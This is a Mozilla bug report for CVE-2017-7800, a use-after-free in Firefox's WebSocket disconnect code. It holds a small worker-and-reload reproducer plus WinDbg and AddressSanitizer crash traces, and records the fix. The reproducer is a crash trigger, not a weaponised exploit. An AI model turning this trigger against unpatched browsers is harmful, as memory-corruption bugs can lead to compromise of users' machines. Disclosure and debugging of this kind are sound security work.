Closed
Bug 1374047
(CVE-2017-7800)
Opened 7 years ago
Closed 7 years ago
WebSocket - Use After Free in WebSocketImpl::DisconnectInternal()
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
RESOLVED
FIXED
mozilla56
People
(Reporter: loobenyang, Assigned: baku)
Details
(5 keywords, Whiteboard: [adv-main55+][adv-esr52.3+])
Attachments
(4 files, 1 obsolete file)
1.09 KB,
application/javascript
|
Details | |
1.89 KB,
text/plain
|
Details | |
1.69 KB,
patch
|
jcristau
:
approval-mozilla-beta+
jcristau
:
approval-mozilla-esr52+
|
Details | Diff | Splinter Review |
1.68 KB,
text/plain
|
Details |
Reproduction test case (whole server code in attached file UAF_DisconnectInternal_Repro.js):
Main page code:
<script>
var worker0 = new Worker("worker0.js");
setTimeout(function(){ worker0.terminate();}, 200);
setTimeout(function(){location.reload()},200);
</script>
Worker code:
new WebSocket("ws://localhost:12345/", "wsm1-protocol");;
Steps to reproduce:
1. Run server side script UAF_DisconnectInternal_Repro.js with Node.js (node UAF_DisconnectInternal_Repro.js).
2. Enter http://localhost:12345 in Firefox browser.
Firefox version: 54.0 (32-bit)
OS: Windows 10
Stack trace:
(16a8.30b4): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=18d77028 ecx=18d77028 edx=e5e5e5e5 esi=67d4b030 edi=18d76f80
eip=65f98e0c esp=0117f1cc ebp=0117f1cc iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282
xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release [inlined in xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12]:
65f98e0c 8b02 mov eax,dword ptr [edx] ds:002b:e5e5e5e5=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
65f98e0c 8b02 mov eax,dword ptr [edx]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 65f98e0c (xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: e5e5e5e5
Attempt to read from address e5e5e5e5
FAULTING_THREAD: 000030b4
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: e5e5e5e5
FOLLOWUP_IP:
xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
65f98e0c 8b02 mov eax,dword ptr [edx]
READ_ADDRESS: e5e5e5e5
WATSON_BKT_PROCSTAMP: 59399e7c
WATSON_BKT_PROCVER: 54.0.0.6368
PROCESS_VER_PRODUCT: Firefox
WATSON_BKT_MODULE: xul.dll
WATSON_BKT_MODSTAMP: 5939a290
WATSON_BKT_MODOFFSET: 88e0c
WATSON_BKT_MODVER: 54.0.0.6368
MODULE_VER_PRODUCT: Firefox
BUILD_VERSION_STRING: 10.0.15063.296 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: 6677a630c80a09dae24ad5f75ef967a3823bc5ff
MODLIST_SHA1_HASH: d474cec995c2004a6ffece945bcd0a3e7837f453
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_TIME: 06-18-2017 22:32:19.0170
ANALYSIS_VERSION: 10.0.15063.400 x86fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENA
PROBLEM_CLASSES:
ID: [0n292]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x30b4]
Frame: [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef
ID: [0n264]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x30b4]
Frame: [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef
ID: [0n94]
Type: [FILL_PATTERN]
Class: Addendum
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Add
String: [e5e5e5e5]
PID: [0x16a8]
TID: [0x30b4]
Frame: [0] : xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5
DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 66cb658b to 65f98e0c
STACK_TEXT:
0117f1cc 66cb658b 00000000 00000000 16daeee0 xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12
0117f1fc 66cba1d4 6620c149 15ac8ec0 15ac8ef4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
0117f200 6620c149 15ac8ec0 15ac8ef4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
0117f214 6620c109 16daeee0 13981380 139813b4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
0117f23c 6620c08d 0117f26c 6620c109 180ec050 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
0117f244 6620c109 180ec050 0b1f5864 180ec060 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
0117f26c 6620c08d 0117f2e4 6601f80e 180ec060 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
0117f274 6601f80e 180ec060 03127170 03127160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
0117f2e4 66020701 03104200 00000000 0117f317 xul!nsThread::ProcessNextEvent+0x213
0117f318 66068ea0 03125060 60944f31 0b1f5860 xul!mozilla::ipc::MessagePump::Run+0x72
0117f350 66068e6f 03104200 00000001 0b1f5800 xul!MessageLoop::RunHandler+0x20
0117f370 662d19d8 0b1f7640 00000000 0117f390 xul!MessageLoop::Run+0x19
0117f380 662d1767 0b1f5860 0b1f7640 0117f3a4 xul!nsBaseAppShell::Run+0x34
0117f390 662d171c 0b1f5860 0117f6f5 0c30a440 xul!nsAppShell::Run+0x26
0117f3a4 66505f9e 0b1f7640 0117f5f8 0117f610 xul!nsAppStartup::Run+0x22
0117f598 665069d0 03103050 0117f740 00000001 xul!XREMain::XRE_mainRun+0xa92
0117f5d4 6658b805 00000000 0117f610 0017f740 xul!XREMain::XRE_main+0x37b
0117f700 6658b7c7 0117f740 0117fa84 01321bdd xul!XRE_main+0x39
0117f70c 01321bdd 00000001 03103050 0117f740 xul!mozilla::BootstrapImpl::XRE_main+0x11
0117fa84 01325b7f 00000001 fe615d08 01718b50 firefox!wmain+0x65d
0117facc 73b48744 00ee0000 73b48720 7b9e292a firefox!__scrt_common_main_seh+0xf9
0117fae0 770a587d 00ee0000 7f378ec4 00000000 KERNEL32!BaseThreadInitThunk+0x24
0117fb28 770a584d ffffffff 770c6344 00000000 ntdll!__RtlUserThreadStart+0x2f
0117fb38 00000000 01325bf5 00ee0000 00000000 ntdll!_RtlUserThreadStart+0x1b
THREAD_SHA1_HASH_MOD_FUNC: c69ed9af77e0e3ae8946fbf3e674aa21f178e624
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: b2a6a3a18b4b25d90fe64452661d0eb068d1731a
THREAD_SHA1_HASH_MOD: 1e517827cf137402b6881f2d4a04f0647425c5be
FAULT_INSTR_CODE: ff52028b
FAULTING_SOURCE_LINE: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h
FAULTING_SOURCE_FILE: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h
FAULTING_SOURCE_LINE_NUMBER: 65
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: xul
IMAGE_NAME: xul.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5939a290
STACK_COMMAND: ~0s ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_c0000005_xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_xul!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef+12
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: xul.dll
BUCKET_ID_IMAGE_STR: xul.dll
FAILURE_MODULE_NAME: xul
BUCKET_ID_MODULE_STR: xul
FAILURE_FUNCTION_NAME: RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
BUCKET_ID_FUNCTION_STR: RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
BUCKET_ID_OFFSET: 12
BUCKET_ID_MODTIMEDATESTAMP: 5939a290
BUCKET_ID_MODCHECKSUM: 31298a4
BUCKET_ID_MODVER_STR: 54.0.0.6368
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_e5e5e5e5_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: xul.dll!RefPtr_mozilla::EditTransactionBase_::assign_assuming_AddRef
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/firefox.exe/54.0.0.6368/59399e7c/xul.dll/54.0.0.6368/5939a290/c0000005/00088e0c.htm?Retriage=1
TARGET_TIME: 2017-06-18T10:33:04.000Z
OSBUILD: 15063
OSSERVICEPACK: 296
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.15063.296
ANALYSIS_SESSION_ELAPSED_TIME: 104d4
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_fill_pattern_e5e5e5e5_c0000005_xul.dll!refptr_mozilla::edittransactionbase_::assign_assuming_addref
FAILURE_ID_HASH: {6bdf5e90-d575-dd3a-0b53-74c46bf9fa98}
Followup: MachineOwner
---------
Variable shows the WebSocketImpl object had been freed:
0:000> dt this
Local var @ edi Type mozilla::dom::WebSocketImpl*
+0x000 __VFN_table : 0xe5e5e5e5
+0x004 __VFN_table : 0xe5e5e5e5
+0x008 __VFN_table : 0xe5e5e5e5
+0x00c __VFN_table : 0xe5e5e5e5
+0x010 mProxy : 0xe5e5e5e5 nsWeakReference
+0x014 __VFN_table : 0xe5e5e5e5
+0x018 __VFN_table : 0xe5e5e5e5
+0x01c mRefCnt : mozilla::ThreadSafeAutoRefCnt
+0x020 mWebSocket : RefPtr<mozilla::dom::WebSocket>
+0x024 mChannel : nsCOMPtr<nsIWebSocketChannel>
+0x028 mIsServerSide : ffffffffffffffe5
+0x029 mSecure : ffffffffffffffe5
+0x02a mOnCloseScheduled : ffffffffffffffe5
+0x02b mFailed : ffffffffffffffe5
+0x02c mDisconnectingOrDisconnected : ffffffffffffffe5
+0x02d mCloseEventWasClean : ffffffffffffffe5
+0x030 mCloseEventReason : nsString
+0x03c mCloseEventCode : 0xe5e5
+0x040 mAsciiHost : nsCString
+0x04c mPort : 0xe5e5e5e5
+0x050 mResource : nsCString
+0x05c mUTF16Origin : nsString
+0x068 mURI : nsCString
+0x074 mRequestedProtocolList : nsCString
+0x080 mOriginDocument : nsCOMPtr<nsIWeakReference>
+0x084 mScriptFile : nsCString
+0x090 mScriptLine : 0xe5e5e5e5
+0x094 mScriptColumn : 0xe5e5e5e5
+0x098 mInnerWindowID : 0xe5e5e5e5`e5e5e5e5
+0x0a0 mWorkerPrivate : 0xe5e5e5e5 mozilla::dom::workers::WorkerPrivate
+0x0a4 mWorkerHolder : nsAutoPtr<mozilla::dom::workers::WorkerHolder>
+0x0a8 mWeakLoadGroup : nsCOMPtr<nsIWeakReference>
+0x0ac mIsMainThread : ffffffffffffffe5
+0x0b0 mMutex : mozilla::Mutex
+0x0b4 mWorkerShuttingDown : ffffffffffffffe5
+0x0b8 mService : RefPtr<mozilla::net::WebSocketEventService>
Reporter | ||
Comment 1•7 years ago
|
||
Ran the same test case in local built Linux ASAN build, it did report a Use After Free:
Firefox version: 56.0a1 (2017-06-17) (64-bit)
=================================================================
==2917==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000d0388 at pc 0x7f8911403be3 bp 0x7fffcedacf50 sp 0x7fffcedacf48
READ of size 8 at 0x6130000d0388 thread T0 (Web Content)
#0 0x7f8911403be2 in assign_assuming_AddRef /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27
#1 0x7f8911403be2 in operator= /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:600
#2 0x7f8911403be2 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:666
#3 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
#4 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
#5 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#6 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#7 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#8 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#9 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
#10 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#11 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#12 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
#13 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#14 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#15 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#16 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
#17 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
#18 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#19 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#20 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#21 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
#22 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#23 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
#24 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#25 0x41da58 in _start (/home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/bin/firefox+0x41da58)
0x6130000d0388 is located 264 bytes inside of 336-byte region [0x6130000d0280,0x6130000d03d0)
freed by thread T0 (Web Content) here:
#0 0x4bef80 in __interceptor_cfree.localalias.0 /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:45
#1 0x7f8911400172 in operator delete /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:218:12
#2 0x7f8911400172 in Release /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
#3 0x7f8911400172 in non-virtual thunk to mozilla::dom::WebSocketImpl::Release() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
#4 0x7f890e33b4dc in ~nsCOMPtr_base /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:294:7
#5 0x7f890e33b4dc in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/thecoder/OpenSrc/firefox/netwerk/base/nsLoadGroup.cpp:644
#6 0x7f8911403952 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:663:5
#7 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
#8 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
#9 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#10 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#11 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#12 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#13 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
#14 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#15 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#16 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
#17 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#18 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#19 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#20 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
#21 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
#22 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#23 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#24 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#25 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
#26 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#27 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
#28 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T29 (DOM Worker) here:
#0 0x4bf108 in __interceptor_malloc /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52
#1 0x4f72dd in moz_xmalloc /home/thecoder/OpenSrc/firefox/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f8911409473 in operator new /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f8911409473 in WebSocket /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:945
#4 0x7f8911409473 in mozilla::dom::WebSocket::ConstructorCommon(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::Sequence<nsString> const&, nsITransportProvider*, nsACString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:1287
#5 0x7f891140b3fe in mozilla::dom::WebSocket::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:986:10
#6 0x7f89128b2000 in mozilla::dom::WebSocketBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WebSocketBinding.cpp:1073:59
#7 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
#8 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
#9 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
#10 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
#11 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
#12 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
#13 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
#14 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
#15 0x7f891acf3543 in Evaluate(JSContext*, js::ScopeKind, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4719:19
#16 0x7f891acf3d2f in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4784:12
#17 0x7f8914a44959 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:1969:10
#18 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
#19 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#20 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#21 0x7f8914af0d17 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5874:7
#22 0x7f89149f2bb2 in Run /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.h:1644:12
#23 0x7f89149f2bb2 in (anonymous namespace)::LoadAllScripts(mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2127
#24 0x7f89149f24b5 in mozilla::dom::workers::scriptloader::LoadMainScript(mozilla::dom::workers::WorkerPrivate*, nsAString const&, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2245:3
#25 0x7f8914b10d0d in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:586:5
#26 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
#27 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#28 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#29 0x7f8914aea4f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5118:7
#30 0x7f8914a36f75 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:2916:9
#31 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#32 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#33 0x7f890f22d296 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:368:5
#34 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#35 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#36 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#37 0x7f890e17e7df in nsThread::ThreadFunc(void*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:503:5
Thread T29 (DOM Worker) created by T0 (Web Content) here:
#0 0x430489 in __interceptor_pthread_create /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:243
#1 0x7f892c5c8698 in _PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:457:14
#2 0x7f892c5c82aa in PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:548:12
#3 0x7f890e180897 in nsThread::Init(nsACString const&) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:685:8
#4 0x7f8914b0eac0 in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerThread.cpp:90:7
#5 0x7f89149e82a4 in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1915:14
#6 0x7f89149e5c8f in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1742:19
